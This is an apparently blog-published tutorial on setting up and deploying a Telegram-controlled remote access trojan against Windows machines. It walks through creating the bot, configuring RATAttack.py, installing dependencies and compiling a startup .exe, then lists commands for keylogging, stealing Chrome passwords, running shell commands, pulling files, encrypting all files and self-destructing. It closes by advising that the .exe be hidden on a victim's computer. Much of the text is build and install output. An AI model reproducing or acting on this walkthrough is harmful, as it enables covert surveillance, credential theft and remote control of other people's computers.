USE TELEGRAM TO HACK AND CONTROL YOUR WINDOWS 10 MACHINE

In this new era of bots, almost everywhere on the internet you talk to, you ask your queries in the web applications all are operated by bots. A bot is something which is operated by your commands on behalf of you. Many companies are nowadays using bots to provide online chat support to their customers, It is something like you say “hi” on chat support, you get “hello, how may I help you” in the reply. This is a great revolution for companies and organization and it helps them a lot in automatically resolving their client’s issue. But what about hackers? Don’t they take advantage of the bots for their selfish use? Well in this article will tell you on how telegram can be used to hack into computer and can be used as bots.

There are many Remote Administration tools (RATs) available in the market but they commonly pose two problems :

First problem is that if you take the control of a computer through some trojan or malware hundred of miles away , in order to have some fun with that machine or to control, you have to configure a Command and Control Server, so that the C & C server give the required commands to the victim machine.
Second problem is the communication between victim machine and C & C server is not encrypted and thus make communication insecure.

So in order to overcome these problems , some researchers use Telegram bots as Remote Administration tool and it overcome these two problem as :

In order to control the victim’s computer , you don’t need to do any port forwarding or host any server as these telegram bots fulfill this problem. The Telegram Bot API connects the victim’s computer the telegram server through which attacker can easily communicate with his victim .
The whole communication is encrypted through HTTPS protocol and helps to prevent any Man-In-The-Middle Attack.
Best thing is attacker can use his/her mobile telegram to control the victim machine or bot.

So let’s dive into the tool and see how it works :

ENVIRONMENT SETTINGS :

We strictly recommend you to use Python 3.7. The upper and below 3.7 version are not supported .
OS : Windows 7,8 and 10 ( Windows10 Recommended ). Not any other operating system is supported .
Only 64-bit windows architecture is supported .
Make sure you have good internet connection

INSTALLATION STEPS:

CREATE YOUR OWN TELEGRAM BOT

For creating the Telegram Bot, download the official app of Telegram through Google Play store .
After downloading, navigate to the search bar of Telegram app and type BotFather .
After the window of BotFather is opened , click start and type /newbot .

Then it will ask you to choose a name for your bot. For instance , let us take the name as test123 .

It will now ask you to choose a username for your bot like here we will choose the username as rsu890_bot .

After performing all the above steps, it will allot you a token ID which something like ‘xx:xx’ . Copy this token ID and save it in protected place as we will be using this token ID to configure the bot.

INSTALLATION AND USAGE OF THE TOOL

Clone the github repository https://github.com/mvrozanti/RAT-via-Telegram.git
Unzip the downloaded folder and open the RATAttack.py with notepad with given folder .
Now press Ctrl+F and search for ‘token’ downwards .

Now paste the token ID of your Bot where your search takes you first i.e. token = ‘xx:xx’ to token = ‘YOUR_TOKEN_ID’ .

Press the Find Next and replace the ‘RVT_TOKEN’ to ‘YOUR_TOKEN_ID’ and token = os.environ[‘RVT_TOKEN’] to token = os.environ[‘YOUR_TOKEN_ID’] and save the file .

Now download the two python libraries from the link given below PyAudio and PyHook from the given link below :

https://www.lfd.uci.edu/~gohlke/pythonlibs/

Download pyHook‑1.5.1‑cp37‑cp37m‑win_amd64.whl and pyHook‑1.5.1‑cp37‑cp37m‑win_amd64.whl .
After downloading the above two libraries install them by opening command prompt and typing the the command pip install

pyHook‑1.5.1‑cp37‑cp37m‑win_amd64.whl and pip install pyHook‑1.5.1‑cp37‑cp37m‑win_amd64.whl .

After downloading the above two libraries , copy the path of downloaded repository, open the command prompt and type cd <path_of_repository> .
Now type the command pip -r requirements.txt .

C:\Users\webimprints\rsu>cd C:\Users\webimprints\rsu\RAT-via-Telegram-master
C:\Users\webimprints\rsu\RAT-via-Telegram-master>pip install -r requirements.txt
Requirement already satisfied: telepot in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 1)) (12.7)Requirement already satisfied: requests in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 2)) (2.23.0)
Requirement already satisfied: image in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 3)) (1.5.28)
Requirement already satisfied: winshell in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 4)) (0.6)
Requirement already satisfied: tendo in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 5)) (0.2.15)
Requirement already satisfied: pypiwin32 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 6)) (223)
Requirement already satisfied: pyinstaller in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 7)) (3.6)
Requirement already satisfied: psutil in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 8)) (5.7.0)
Requirement already satisfied: pillow in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 9)) (7.1.1)
Requirement already satisfied: opencv-python in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 10)) (4.2.0.34)
Requirement already satisfied: console-tools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 11)) (0.2.1)
Requirement already satisfied: urllib3>=1.9.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (1.25.8)
Requirement already satisfied: aiohttp>=3.0.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (3.6.2)
Requirement already satisfied: certifi>=2017.4.17 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2020.4.5.1)
Requirement already satisfied: chardet<4,>=3.0.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (3.0.4)
Requirement already satisfied: idna<3,>=2.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2.9)
Requirement already satisfied: django in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from image->-r requirements.txt (line 3)) (3.0.5)
Requirement already satisfied: six>=1.7.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (1.14.0)
Requirement already satisfied: pbr in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (5.4.4)
Requirement already satisfied: setuptools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (40.8.0)
Requirement already satisfied: pip in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (20.0.2)
Requirement already satisfied: pywin32>=223 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pypiwin32->-r requirements.txt (line 6)) (227)
Requirement already satisfied: pefile>=2017.8.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (2019.4.18)
Requirement already satisfied: pywin32-ctypes>=0.2.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.2.0)
Requirement already satisfied: altgraph in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.17)
Requirement already satisfied: numpy>=1.14.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from opencv-python->-r requirements.txt (line 10)) (1.18.2)
Requirement already satisfied: termcolor in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (1.1.0)
Requirement already satisfied: colorama in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (0.4.3)
Requirement already satisfied: yarl<2.0,>=1.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (1.4.2)
Requirement already satisfied: multidict<5.0,>=4.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (4.7.5)
Requirement already satisfied: async-timeout<4.0,>=3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (3.0.1)
Requirement already satisfied: attrs>=17.3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (19.3.0)
Requirement already satisfied: sqlparse>=0.2.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (0.3.1)
Requirement already satisfied: asgiref~=3.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (3.2.7)
Requirement already satisfied: pytz in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (2019.3)
Requirement already satisfied: future in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pefile>=2017.8.1->pyinstaller->-r requirements.txt (line 7)) (0.18.2)

Now your tool is ready to go, you can use use it by typing the command python RATAttack.py .

Now you can open you telegram app in your mobile phone and search for your bot username for example rsu890_bot and type the command in the chatbox /help.

It will show you the following commands :

arp - display arp table
capture_pc - screenshot PC
cmd_exec - execute shell command
cp - copy files
cd - change current directory
delete - delete a file/folder
download - download file from target
decode_all - decode ALL encoded local files
dns - display DNS Cache
encode_all - encode ALL local files
freeze_keyboard - enable keyboard freeze
unfreeze_keyboard - disable keyboard freeze
get_chrome - Get Google Chrome's login/passwords
hear - record microphone
ip_info - via ipinfo.io
keylogs - get keylogs
ls - list contents of current or specified directory
msg_box - display message box with text
mv - move files
pc_info - PC information
ping - makes sure target is up
play - plays a youtube video
proxy - opens a proxy server
pwd - show current directory
python_exec - interpret python
reboot - reboot computer
run - run a file
schedule - schedule a command to run at specific time
self_destruct - destroy all traces
shutdown - shutdown computer
tasklist - display services and processes running
to - select targets by it's name
update - update executable
wallpaper - change wallpaper

NOW LET’S HAVE SOME FUN WITH THE TARGETED MACHINE :

Search for your required bot in the telegram app and type /pc_info to get the information about the victim’s machine.
You can see and alter the windows file of the victim’s systems by typing the command /cd C:\Windows\system32

You can see the DNS records of the victim’s machine by typing the /dns.

see the DNS records of the victim’s machine

If you want that target machine should communicate with you only , replace the CHAT_ID in the RATAttack.py as :

Similarly , you can play a youtube video by giving the command /play <VIDEO_ID>
You can shutdown or restart the victim’s computer by

/shutdown or /restart respectively

You can do many more tasks by reading the /help manual !!!

USING THE TOOL AS A TROJAN :

Yes we can use this tool as a trojan. As we all know that the easiest path to deliver malware to someone’s computer is through packing the malware into .exe and send it to the victim . Here we will do the same thing by creating an .exe which will always run at the startup. To make .exe file , follow the steps as:

Open the compile.py with notepad in the downloaded folder .
Comment the statement download_and _install_lfd_uci_wheel(‘pyAudio’) and download_and _install_lfd_uci_wheel(‘pyHook’) to #download_and _install_lfd_uci_wheel(‘pyAudio’) and #download_and _install_lfd_uci_wheel(‘pyHook’) respectively and save the file .
Now again open the terminal and move to the RATAttack folder by typing the command cd <path_of_RATAttack>.
Now run the command python compile.py to run and build the .exe file

C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master>python compile.py
Now going to install dependencies and compile the rat, make sure you have prepped RATAttack.py beforehand
Press ENTER to resumeRequirement already satisfied: telepot in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 1)) (12.7)
Requirement already satisfied: requests in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 2)) (2.23.0)
Requirement already satisfied: image in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 3)) (1.5.28)
Requirement already satisfied: winshell in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 4)) (0.6)
Requirement already satisfied: tendo in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 5)) (0.2.15)
Requirement already satisfied: pypiwin32 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 6)) (223)
Requirement already satisfied: pyinstaller in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 7)) (3.6)
Requirement already satisfied: psutil in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 8)) (5.7.0)
Requirement already satisfied: pillow in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 9)) (7.1.1)
Requirement already satisfied: opencv-python in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 10)) (4.2.0.34)
Requirement already satisfied: console-tools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 11)) (0.2.1)
Requirement already satisfied: urllib3>=1.9.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (1.25.8)
Requirement already satisfied: aiohttp>=3.0.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (3.6.2)
Requirement already satisfied: idna<3,>=2.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2.9)
Requirement already satisfied: certifi>=2017.4.17 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2020.4.5.1)
Requirement already satisfied: chardet<4,>=3.0.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (3.0.4)
Requirement already satisfied: django in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from image->-r requirements.txt (line 3)) (3.0.5)
Requirement already satisfied: setuptools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (40.8.0)
Requirement already satisfied: pbr in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (5.4.4)
Requirement already satisfied: pip in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (20.0.2)
Requirement already satisfied: six>=1.7.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (1.14.0)
Requirement already satisfied: pywin32>=223 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pypiwin32->-r requirements.txt (line 6)) (227)
Requirement already satisfied: pywin32-ctypes>=0.2.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.2.0)
Requirement already satisfied: pefile>=2017.8.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (2019.4.18)
Requirement already satisfied: altgraph in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.17)
Requirement already satisfied: numpy>=1.14.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from opencv-python->-r requirements.txt (line 10)) (1.18.2)
Requirement already satisfied: termcolor in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (1.1.0)
Requirement already satisfied: colorama in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (0.4.3)
Requirement already satisfied: attrs>=17.3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (19.3.0)
Requirement already satisfied: yarl<2.0,>=1.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (1.4.2)
Requirement already satisfied: async-timeout<4.0,>=3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (3.0.1)
Requirement already satisfied: multidict<5.0,>=4.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (4.7.5)
Requirement already satisfied: pytz in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (2019.3)
Requirement already satisfied: asgiref~=3.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (3.2.7)
Requirement already satisfied: sqlparse>=0.2.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (0.3.1)
Requirement already satisfied: future in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pefile>=2017.8.1->pyinstaller->-r requirements.txt (line 7)) (0.18.2)
'upx' is not recognized as an internal or external command,
operable program or batch file.
Did the install run correctly?
Press ENTER to build
139 INFO: PyInstaller: 3.6
143 INFO: Python: 3.7.4
143 INFO: Platform: Windows-10-10.0.18362-SP0
143 INFO: wrote C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\RATAttack.spec
146 INFO: UPX is not available.
146 INFO: Removing temporary files and cleaning cache in C:\Users\webimprints\rsu\AppData\Roaming\pyinstaller
178 INFO: Extending PYTHONPATH with paths
['C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master',
'C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master']
182 INFO: checking Analysis
182 INFO: Building Analysis because Analysis-00.toc is non existent
182 INFO: Initializing module dependency graph…
189 INFO: Caching module graph hooks…
209 INFO: Analyzing base_library.zip …
8635 INFO: Caching module dependency graph…
8807 INFO: running Analysis Analysis-00.toc
8823 INFO: Adding Microsoft.Windows.Common-Controls to dependent assemblies of final executable
required by c:\users\webimprints\rsu\appdata\local\programs\python\python37\python.exe
8965 INFO: Analyzing C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\RATAttack.py
11708 INFO: Processing pre-find module path hook distutils
11708 INFO: distutils: retargeting to non-venv dir 'c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib'
14101 INFO: Processing pre-find module path hook site
14105 INFO: site: retargeting to fake-dir 'c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages\PyInstaller\fake-modules'
17175 INFO: Processing pre-safe import module hook setuptools.extern.six.moves
24228 INFO: Processing pre-safe import module hook win32com
26225 INFO: Processing pre-safe import module hook urllib3.packages.six.moves
29213 INFO: Processing module hooks…
29213 INFO: Loading module hook "hook-certifi.py"…
29213 INFO: Loading module hook "hook-cv2.py"…
29213 INFO: Loading module hook "hook-distutils.py"…
29228 INFO: Loading module hook "hook-encodings.py"…
29369 INFO: Loading module hook "hook-lib2to3.py"…
29384 INFO: Loading module hook "hook-numpy.core.py"…
29900 INFO: Loading module hook "hook-numpy.py"…
29900 INFO: Loading module hook "hook-PIL.Image.py"…
31044 INFO: Loading module hook "hook-PIL.py"…
31047 INFO: Import to be excluded not found: 'FixTk'
31051 INFO: Import to be excluded not found: 'PyQt4'
31051 INFO: Import to be excluded not found: 'PySide'
31051 INFO: Excluding import 'PyQt5'
31055 INFO: Removing import of PyQt5 from module PIL.ImageQt
31059 INFO: Excluding import 'tkinter'
31063 INFO: Removing import of tkinter from module PIL.ImageTk
31067 INFO: Loading module hook "hook-PIL.SpiderImagePlugin.py"…
31071 INFO: Import to be excluded not found: 'FixTk'
31074 INFO: Excluding import 'tkinter'
31083 INFO: Loading module hook "hook-pkg_resources.py"…
32079 INFO: Excluding import 'main'
32083 INFO: Removing import of main from module pkg_resources
32083 INFO: Loading module hook "hook-pydoc.py"…
32086 INFO: Loading module hook "hook-pythoncom.py"…
32454 INFO: Loading module hook "hook-pywintypes.py"…
32817 INFO: Loading module hook "hook-setuptools.py"…
33720 INFO: Loading module hook "hook-sqlite3.py"…
33861 INFO: Loading module hook "hook-sysconfig.py"…
33861 INFO: Loading module hook "hook-win32com.py"…
34049 INFO: Loading module hook "hook-xml.dom.domreg.py"…
34049 INFO: Loading module hook "hook-xml.etree.cElementTree.py"…
34049 INFO: Loading module hook "hook-xml.py"…
34049 INFO: Loading module hook "hook-_tkinter.py"…
34377 INFO: checking Tree
34377 INFO: Building Tree because Tree-00.toc is non existent
34377 INFO: Building Tree Tree-00.toc
34517 INFO: checking Tree
34517 INFO: Building Tree because Tree-01.toc is non existent
34517 INFO: Building Tree Tree-01.toc
34673 INFO: Looking for ctypes DLLs
34829 INFO: Analyzing run-time hooks …
34845 INFO: Including run-time hook 'pyi_rth_pkgres.py'
34845 INFO: Including run-time hook 'pyi_rth_win32comgenpy.py'
34861 INFO: Including run-time hook 'pyi_rth_multiprocessing.py'
34877 INFO: Including run-time hook 'pyi_rth_certifi.py'
34907 INFO: Looking for dynamic libraries
37430 INFO: Looking for eggs
37430 INFO: Using Python library c:\users\webimprints\rsu\appdata\local\programs\python\python37\python37.dll
37445 INFO: Found binding redirects:
[]
37461 INFO: Warnings written to C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\warn-RATAttack.txt
37804 INFO: Graph cross-reference written to C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\xref-RATAttack.html
37867 INFO: checking PYZ
37867 INFO: Building PYZ because PYZ-00.toc is non existent
37867 INFO: Building PYZ (ZlibArchive) C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\PYZ-00.pyz
40633 INFO: Building PYZ (ZlibArchive) C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\PYZ-00.pyz completed successfully.
40712 INFO: checking PKG
40712 INFO: Building PKG because PKG-00.toc is non existent
40712 INFO: Building PKG (CArchive) PKG-00.pkg
60100 INFO: Building PKG (CArchive) PKG-00.pkg completed successfully.
441806 INFO: Bootloader c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages\PyInstaller\bootloader\Windows-64bit\run.exe
441806 INFO: checking EXE
441822 INFO: Building EXE because EXE-00.toc is non existent
441837 INFO: Building EXE from EXE-00.toc
441837 INFO: Appending archive to EXE C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\dist\RATAttack.exe
442041 INFO: Building EXE from EXE-00.toc completed successfully.
Script has finished
C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master>cd C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master

As you can see, that compilation is successful , now your .exe file is build and you can see this file by going into \dist and run this file in the same way as you ran the tool in above steps .

If you have access to victim’s computer for a while you can hide this .exe file and keep it running the background or you can bind this .exe file and do some scripting to hide in the victim’s computer .

.exe file and keep it running the background

CONCLUSION :

The whole tool is written in python which is provides many functions in the tool. The concept behind this tool is much better than any other malware attacking and it helps the attacker to easily communicate with the victim’s system with less technical knowledge required .

RSU

RSU is security researcher who is constantly working to make world a secure place to live. He is working day and night in Cyber Security area.

USE TELEGRAM TO HACK AND CONTROL YOUR WINDOWS 10 MACHINE

ENVIRONMENT SETTINGS :

INSTALLATION STEPS:

CREATE YOUR OWN TELEGRAM BOT

INSTALLATION AND USAGE OF THE TOOL

NOW LET’S HAVE SOME FUN WITH THE TARGETED MACHINE :

USING THE TOOL AS A TROJAN :

CONCLUSION :

Critical Vulnerabilities in Cisco ASA & FTD Exposed! Learn How to Exploit CVE-2024-20353 and CVE-2024-20359

Dual Vulnerabilities in Microsoft SharePoint Server: Essential Steps to Mitigate Vulnerabilities

Exploiting the High-Risk Vulnerabilities in Secure Boot of Most Linux Devices on the Planet

Hackers’ New Target is containerized environments through vulnerabilities in runC

Hacking Android, Linux, macOS, iOS, Windows Devices via Bluetooth using a single vulnerability

110 Million AT&T Customers’ Data leaked: Inside the $370,000 Ransom Payment

How Hackers Stole Taylor Swift Tickets: The Full Ticketmaster Breach Story

Dark Web Sale: AMD’s Confidential Data Leaked – Full Story Revealed!

How Snowflake Hack is Linked to Santander(Spain, Chile, Uruguay) and Ticketmaster Breaches.Are You Affected?

Healthcare Hack Horror: Cyberattacks Leave French Hospitals in Chaos for $10 Million

Hacking the Unhackable: The Story of How CISA Was Breached

The Cloudflare Hack: A Hacker, 5000 Credentials, and Operation Code Red

One Man Scammed Spotify, Apple Music for 5 years with 4 BILLION Streams. How Artists Are Earning Millions Illegally?

Comparing CIS v8, CIS AWS Foundations Benchmark v1.5, and PCI DSS v4.0 for CSPM. Which you Should Start With?

MITRE EMB3D Explained: Top Threats to Embedded Devices and How EMB3D Mitigates Them

Google Gemini Under Fire: Critical Security Vulnerabilities You Need to Know to hack Gemini

Cracking SCCM Wide Open: Pentesting System Center Configuration Manager with Misconfiguration Manager

Hacking Windows 10 and 11 with DLL Search Order Hijacking without administrator rights

Hacking SSH Connections by exploiting SSH Protocol Vulnerabilities: Different Terrapin Attack Vectors

Understanding Latest DHCP DNS Vulnerabilities and How DHCP Exploits work in Active Directory

Hacking Bluetooth via MiTM: The BLUFFS Bluetooth attack to hack into Millions of Devices

6 Steps to File Anonymous SEC Complaints Against Data Breachers & Force Them to Pay Fines or Take Action

Inside the Exploit: How Your ChatGPT’s Uploaded Files Could Be Stolen by Prompt Injection Vulnerability

This Google Calendar technique allows to hack into companies without getting detected

This telegram bot is like ChatGPT for scammers to steal money from victims easily

How easy is to bomb someone mobile phone with thousands of SMS messages?

This new DDoS attack prevention technique has a 99% accuracy rate

The Dark Side of PDFs: How Opening a Simple PDF Could Unleash a Cybersecurity Nightmare

Largest soft drink bottle supplier, recycle and plastic manufacturers hacked by ransomware

Visited thesaurus.com in search for Synonyms? You have Coinminer malware infection

How to send malware via Teams, even “Safe Attachments” or “Safe Links” can’t protect you

2 Big Cloud hosting companies shutdown by ransomware and lose all customer data